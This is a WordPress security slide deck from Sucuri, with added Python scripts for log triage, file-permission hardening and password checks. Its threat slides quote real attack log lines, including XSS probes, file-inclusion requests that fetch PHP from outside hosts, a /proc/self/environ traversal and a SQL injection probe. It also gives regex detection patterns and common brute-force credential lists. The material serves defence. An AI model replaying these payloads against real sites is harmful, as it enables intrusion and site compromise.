WordPress Website Security
Slide 1: WordPress Website Security
Trends, Threats, Defenses
Slide 2: root@web # WHOIS PEREZBOX
04/11/2023
Specialization: Website Security, Incident Handling, Log Analysis
Special Interests: Warfare, Weapons, Martial Arts
Tony Perez | @perezbox | @sucuri_security 2
Slide 3: Website Security Company
Global Operations
All Website Platforms
Scan 1M Unique Domains a Month
Block 1M Web Attacks a Month
300 – 500 Websites a Day
Signature / Heuristic Based
24/5 - 18/2 Operations
Slide 4: Today's Discussion
Trends, Threats, Defenses
SIMPLE RIGHT?
Slide 5: Trends
Slide 6: Explosion in Web Malicious Links
Chart: Malicious Links, 2011 vs 2012 – 600%
Slide 7: Malicious Links?
Diagram: Malicious Links – Social Media, Email Links, Website, Text Messages
Slide 8: The Web Is The Source
Chart: Known Malware vs Unknown Malware – 90%
Slide 9: What's a Good Host?
Chart: Not Infected vs Infected – 85%
Slide 10: Malware Type Distribution
9 Million Unique Domains Scanned – 19% Infected
Chart: Malware Type Distribution
Remote iFrame Includes – 26%
Remote JavaScript Includes – 19%
SPAM Injections – 16%
Obfuscated / Encoded JavaScript – 14%
Conditional Redirects – 11%
Defacements – 4%
Other – 10%
Slide 11: Targeting Environments
Apache, SSH, Email Server
Going deeper than the application layer, targeting the server.
Server polymorphism – a.k.a. it changes a lot
Slide 12: Exploiting Forms
Stick with reputable sources: Gravity Forms, JetPack Forms
Generating SPAM emails, resource hogs
IP blacklisting
Leverage Captchas
Slide 13: Spear Phishing / Phishing Increase
55% of companies have fallen victim
Slide 14: Search Engine Poisoning (SEP)
Pharmacy, Payday Loans
Slide 15: Automated Attacks
Access – so easy, yet so weak
Diagram: WP-Admin → Editor / Widgets / Posts → Payload
Slide 16: Brute Force Attacks
Slide 17: April Brute Force Attacks
Slide 18: Cross-Site Contamination
Diagram: Site 1, Site 2, Site 3, Site 4 running WordPress 2.8, 3.5.1, 3.4.2 and 3.0
Slide 19: iFrame Injections
Slide 20: Drive-By Downloads
Slide 21: Targeting Java Zero-Days
Slide 22: Targeting Mobile Devices
Slide 23: Google is On Fire
Slide 24: Exploiting Trust
Slide 25: Latest Plugin Issues
W3TC & WP Super Cache Remote Command Execution (RCE) Vulnerability
WPMM SPAM Injections (Bad Plugin)
Social Media Widget SPAM Injections (Core Commit)
Slide 26: There's a Tool for That
Explosion in the Malware as a Service (MaaS) trade – yes, pay someone to hack for you
Different tools to break in and generate payloads: brute force and vulnerability exploits, malware payloads
Blackhole Exploit Kit – today's market leader (2013 – SophosLabs)
Slide 27: Don't Worry, Everyone is a Target
Slide 29: Threats
Slide 30: Anatomy of Web Attacks
Recon → Identify → Attack → Sustain
What kind of website do you have?
Use for malware? Burrow into network? Steal data?
Slide 31: Cross-Site Scripting (XSS)
Stored / Reflective
38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268
Slide 32: Remote / Local File Inclusion (RFI)
[02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&sa=U&ei=vGBcUYS1IcOaiQLxu4HIBg&ved=0CCYQFjAE&usg=AFQjCNFN1APEnX9-WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
Slide 33: SQL Injection
62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9"
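The three log slides above show what XSS, file-inclusion and SQL-injection probes look like in an Apache access log. As an added example that is not part of the deck, the Python script below parses combined-log lines, URL-decodes the request target and tags each request with the attack class it matches, then counts hits per source IP. The input is the deck's own log lines plus one constructed benign request (203.0.113.7, a documentation address); the rule set, tag names and function names are my own, written as coarse review signatures for log triage rather than as a WAF rule set.

```python
import re
import urllib.parse

# Sample access-log lines: the five attack probes shown on the slides, plus one
# constructed benign request (203.0.113.7) so a clean line is exercised too.
SAMPLE_LOG = r'''
38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268
83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&sa=U&ei=vGBcUYS1IcOaiQLxu4HIBg&ved=0CCYQFjAE&usg=AFQjCNFN1APEnX9-WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9"
203.0.113.7 - - [03/Apr/2013:06:00:00 -0400] "GET /about/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
'''

# Common/combined log format: client IP, timestamp, request line, status. Referrer and
# user agent are optional because one of the slide lines was captured without them.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Coarse signatures, applied to the URL-decoded target. Tag names are my own.
RULES = {
    "xss": re.compile(r"<script|onerror\s*=|javascript:", re.I),
    "traversal_lfi": re.compile(r"\.\./|/proc/self/environ|\x00", re.I),
    "rfi": re.compile(r"=\s*https?://", re.I),          # parameter pointing at a remote URL
    "sqli": re.compile(r"\bunion\s+(all\s+)?select\b|'\s*or\s+\d+=\d+|--\s*$", re.I),
}


def parse_line(line):
    """Split one access-log line into fields; the target is URL-decoded ('+' becomes space)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "target": urllib.parse.unquote_plus(m.group("target")),
        "status": int(m.group("status")),
    }


def classify(target):
    """Return the sorted list of rule names whose signature matches the decoded target."""
    return sorted(name for name, rx in RULES.items() if rx.search(target))


def triage(log_text):
    """Return only the records that matched at least one rule, each with its tags."""
    findings = []
    for line in log_text.strip().splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec["target"])
        if tags:
            rec["tags"] = tags
            findings.append(rec)
    return findings


def offenders_by_ip(findings):
    """Count flagged requests per source IP, the usual first pivot during log review."""
    counts = {}
    for rec in findings:
        counts[rec["ip"]] = counts.get(rec["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = triage(SAMPLE_LOG)
    for rec in hits:
        print(f'{rec["ip"]:16} {rec["status"]} {",".join(rec["tags"]):14} {rec["target"][:60]}')
    print(offenders_by_ip(hits))
```

Note that the status code is kept on purpose: a 200 on the `thumb.php?src=http://...` or `union select` lines (as on the slides) is what turns a probe into an incident to investigate, whereas a 404 or 302 usually means the probe bounced.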
Slide 34: Spear Phishing
Slide 35: Backdoors
Slide 36: What's all this mean?
Brand Reputation
Legal Implications
Impact to Sales
Blacklisted by Search Engines
Blacklisted by Payment Processors
Worst Day of Your Life
Slide 37: Defenses
Slide 38: Areas to Focus On
Access Control, Vulnerabilities, Hosting, Online Habits, Social Media, Passwords
Slide 39: Manage Our Own Expectations
"It's about risk reduction… risk will never be zero…"
Slide 40: The Foundation
We run on WordPress – current version, of course
Sucuri properties suffer ~125,000 web-based attacks a month on average
~4,000 attacks a day; this spikes on occasion
Doesn't include server-level attacks
All flavors of attacks
Slide 41: Defense in Depth Approach
Instead of telling you what you need to do, I'll just tell you what we do;
Our philosophy and approach is very simple: complex things break in complex ways;
We focus on the areas that we can immediately control;
We believe in layered defenses;
Slide 42: What we do… for websites
Stay Current
IP Whitelisting
Two-Factor Authentication
Strong / Unique Password
Web Application Firewall
Slide 43: What we do… for servers
IP Whitelisting
Server Isolation
Public Key Authentication
Host Intrusion Detection System (HIDS)
Log Everything
Slide 44: My Personal Configurations.. Tools..
Category | Tool | Type
Prevention – Software Vulnerabilities | Sucuri CloudProxy | Service
Prevention – Access Control | Sucuri CloudProxy | Service
Detection | Sucuri Monitoring | Service
Remediation | Sucuri | Service
Password Management | 1Password / LastPass | Application
Host-based Intrusion Detection System | OSSEC | Application
Access Control Enforcement | Login Secure Solutions | Plugin
Two-Factor Authentication | Google Authenticator | Plugin
Application Auditing | Sucuri Premium | Plugin
Backups | BackupBuddy | Plugin
Slide 45: My Personal Configurations… cntd..
Category | Location | Type
Disable Theme / Plugin Editor | wp-config.php | Preventive measure
Disable PHP execution | .htaccess – uploads / images / wp-includes / etc. | Preventive measure
Permissions | Directories 755 / Files 644 | Preventive measure
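The three preventive measures in the table above are all checkable on disk. As an added example that is not from the deck, the Python script below builds a small constructed WordPress-like tree with deliberate misconfigurations, audits it against the three rules (editor disabled in wp-config.php, no PHP served from uploads, 755/644 permissions) and then applies the fixes. The audit issue names, the `harden()`/`audit()` functions and the demo tree are my own; `DISALLOW_FILE_EDIT` is the real WordPress constant, and the `.htaccess` block uses Apache 2.4 `Require all denied` syntax. Only `wp-content/uploads` is treated as a no-execute directory here; the slide also lists images and wp-includes.

```python
import os
import re
import stat
import tempfile

# Apache 2.4 directive: refuse to serve any .php file from the directory holding this .htaccess.
NO_PHP_HTACCESS = '<FilesMatch "\\.php$">\n    Require all denied\n</FilesMatch>\n'

# Directories that must never execute PHP. The slide also names images and wp-includes;
# add them here for a real site (the demo tree only has uploads).
NO_EXEC_DIRS = (os.path.join("wp-content", "uploads"),)

DIR_MODE, FILE_MODE = 0o755, 0o644
# Matches define('DISALLOW_FILE_EDIT', true); with either quote style and loose spacing.
EDITOR_OFF_RE = re.compile(r"define\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)", re.I)


def _mode(path):
    return stat.S_IMODE(os.lstat(path).st_mode)


def audit(docroot):
    """Return sorted (relative_path, issue) pairs for every violation of the slide's three rules."""
    issues = []
    for root, _dirs, files in os.walk(docroot):
        rel = os.path.relpath(root, docroot)
        rel = "" if rel == "." else rel
        if rel and _mode(root) != DIR_MODE:
            issues.append((rel, "dir-mode"))
        in_no_exec = any(rel == d or rel.startswith(d + os.sep) for d in NO_EXEC_DIRS)
        if rel in NO_EXEC_DIRS and ".htaccess" not in files:
            issues.append((rel, "missing-htaccess"))
        for name in files:
            full = os.path.join(root, name)
            relf = os.path.join(rel, name) if rel else name
            if _mode(full) != FILE_MODE:
                issues.append((relf, "file-mode"))
            if in_no_exec and name.endswith(".php"):
                # Blocking execution does not remove the file; it still needs a look.
                issues.append((relf, "php-in-no-exec-dir"))
            if name == "wp-config.php":
                with open(full) as fh:
                    if not EDITOR_OFF_RE.search(fh.read()):
                        issues.append((relf, "editor-enabled"))
    return sorted(issues)


def harden(docroot):
    """Apply the three preventive measures; returns the number of changes made."""
    changes = 0
    for root, dirs, files in os.walk(docroot):
        for d in dirs:
            p = os.path.join(root, d)
            if _mode(p) != DIR_MODE:
                os.chmod(p, DIR_MODE)
                changes += 1
        for f in files:
            p = os.path.join(root, f)
            if _mode(p) != FILE_MODE:
                os.chmod(p, FILE_MODE)
                changes += 1
    for d in NO_EXEC_DIRS:
        ht = os.path.join(docroot, d, ".htaccess")
        if not os.path.exists(ht):
            with open(ht, "w") as fh:
                fh.write(NO_PHP_HTACCESS)
            os.chmod(ht, FILE_MODE)
            changes += 1
    cfg = os.path.join(docroot, "wp-config.php")
    with open(cfg) as fh:
        text = fh.read()
    if not EDITOR_OFF_RE.search(text):
        # The define must come before wp-settings.php is required, so insert above it.
        line = "define('DISALLOW_FILE_EDIT', true);\n"
        marker = text.find("require_once")
        text = text[:marker] + line + text[marker:] if marker >= 0 else text + line
        with open(cfg, "w") as fh:
            fh.write(text)
        changes += 1
    return changes


def build_demo_site():
    """Constructed demo tree (not a real install) with one violation of each rule."""
    docroot = tempfile.mkdtemp(prefix="wpdemo-")
    uploads = os.path.join(docroot, "wp-content", "uploads")
    os.makedirs(uploads)
    with open(os.path.join(docroot, "wp-config.php"), "w") as fh:
        fh.write("<?php\n$table_prefix = 'wp_';\nrequire_once ABSPATH . 'wp-settings.php';\n")
    with open(os.path.join(uploads, "photo.jpg"), "w") as fh:
        fh.write("constructed placeholder, not a real image\n")
    with open(os.path.join(uploads, "dropped.php"), "w") as fh:
        fh.write("<?php // constructed stand-in for an unexpected file in uploads\n")
    os.chmod(uploads, 0o777)                              # world-writable directory
    os.chmod(os.path.join(uploads, "photo.jpg"), 0o666)   # world-writable file
    return docroot


if __name__ == "__main__":
    site = build_demo_site()
    print("before:", audit(site))
    print("changes:", harden(site))
    print("after: ", audit(site))
```

After `harden()` the only remaining finding is the `.php` file inside uploads: the `.htaccess` stops Apache from serving it, but the file itself is evidence to examine and remove, which no permission or directive change does for you.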
Slide 46: Hosting
• Don't know what you're doing?
• Go with a managed host…
Slide 47: Managed Hosting Options
Doesn't mean you won't ever get infected.
Slide 48: Passwords
Complex . Long . Unique . Esoteric – "CLUE"
Epic Fail – usernames and passwords seen in brute-force attempts
Count | Username
652,911 | admin
10,173 | test
8,992 | administrator
8,921 | Admin
2,495 | root
Count | Password
16,798 | admin
10,880 | 123456
9,727 | 666666
9,106 | 111111
7,882 | 12345678
7,717 | qwerty
7,295 | 1234567
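The "CLUE" rule and the two lists above translate directly into a registration-time check. As an added example that is not from the deck, the Python below rejects any account name or password that appears in the lists the slide shows, then applies the complex/long/unique/esoteric criteria; the thresholds (16 characters, three character classes) and the failure labels are my own choices, not the speaker's.

```python
import string

# Usernames and passwords seen in brute-force attempts, exactly as listed on the slide.
OBSERVED_USERNAMES = {"admin", "test", "administrator", "root"}          # "Admin" folds to admin
OBSERVED_PASSWORDS = {"admin", "123456", "666666", "111111", "12345678", "qwerty", "1234567"}

CHARACTER_CLASSES = (
    string.ascii_lowercase,
    string.ascii_uppercase,
    string.digits,
    string.punctuation,
)


def check_password(password, username="", min_length=16, min_classes=3):
    """Return the list of CLUE rules the candidate fails; an empty list means it passes."""
    failures = []
    # Unique: never a value attackers are already trying.
    if password.lower() in OBSERVED_PASSWORDS:
        failures.append("unique: in attacker wordlist")
    # Long: assumed threshold of 16 characters.
    if len(password) < min_length:
        failures.append(f"long: fewer than {min_length} characters")
    # Complex: at least three of lower, upper, digit, punctuation.
    classes = sum(1 for cls in CHARACTER_CLASSES if any(ch in cls for ch in password))
    if classes < min_classes:
        failures.append(f"complex: fewer than {min_classes} character classes")
    # Esoteric: not derived from the account name, not a digit run or repeated character.
    if username and username.lower() in password.lower():
        failures.append("esoteric: contains the account name")
    if password.isdigit() or len(set(password)) <= 2:
        failures.append("esoteric: digit-only or repeated characters")
    return failures


def check_username(username):
    """True when the account name is not one of the names attackers spray first."""
    return username.lower() not in OBSERVED_USERNAMES


if __name__ == "__main__":
    for user, pw in (("admin", "123456"), ("t.perez", "Correct-Horse.Battery7staple")):
        print(user, check_username(user), pw, check_password(pw, username=user) or "ok")
```

Rejecting the usernames matters as much as the passwords: every one of the 652,911 attempts against `admin` on the slide fails outright when no such account exists.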
Slide 49: Notable Plugins
Access | Login Secure Solution, Stealth Login, Limit Login
Scanning | WordFence, Anti-Malwatch
Defense in Depth | Better WP Security, BulletProof Security
Vulnerabilities | MVIS Security Center
Slide 50: Notable Resources
Name | URL
Sucuri Blog | http://blog.sucuri.net
Sucuri TV | http://sucuri.tv
WordPress Forum – Hacked | http://wordpress.org/tags/hacked
WordPress Forum – Malware | http://wordpress.org/tags/malware
Badware Busters | https://badwarebusters.org
Perishable Press | http://perishablepress.com/category/web-design/security/
Google Forums | http://productforums.google.com/forum/#!categories/webmasters/malware--hacked-sites
WordPress.org Hardening | http://codex.wordpress.org/Hardening_WordPress
Google Webmaster Tools | http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633
Secunia Security Advisories | http://secunia.com/community/advisories/search/?search=wordpress
Exploit-DB | http://www.exploit-db.com/search/?action=search&filter_description=Wordpress&filter_platform=31
Slide 51: Thanks